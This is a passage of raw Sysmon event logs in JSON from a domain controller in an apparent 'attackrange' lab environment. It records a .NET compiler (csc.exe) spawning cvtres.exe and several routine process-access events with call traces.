06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5137,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.777\r\nProcessGuid: {E2A3D6B1-11C7-5F25-0000-001012310700}\r\nProcessId: 4708\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESB165.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\CSC451B4EE9C2C740AFA8B7E917B4D7607D.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11C4-5F25-0000-002093D80600}\r\nLogonId: 0x6D893\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {E2A3D6B1-11C7-5F25-0000-0010882D0700}\r\nParentProcessId: 4228\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\c42geipp.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.777","ProcessGuid":"{E2A3D6B1-11C7-5F25-0000-001012310700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESB165.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\CSC451B4EE9C2C740AFA8B7E917B4D7607D.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11C4-5F25-0000-002093D80600}","LogonId":"0x6d893","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{E2A3D6B1-11C7-5F25-0000-0010882D0700}","ParentProcessId":"4228","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\c42geipp.cmdline\"","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5138,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-11C7-5F25-0000-0010882D0700}\r\nSourceProcessId: 4228\r\nSourceThreadId: 4548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {E2A3D6B1-11C7-5F25-0000-001012310700}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.772","SourceProcessGUID":"{E2A3D6B1-11C7-5F25-0000-0010882D0700}","SourceProcessId":"4228","SourceThreadId":"4548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{E2A3D6B1-11C7-5F25-0000-001012310700}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5139,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C7-5F25-0000-001012310700}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.772","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C7-5F25-0000-001012310700}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5140,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5141,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5142,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5143,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5144,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 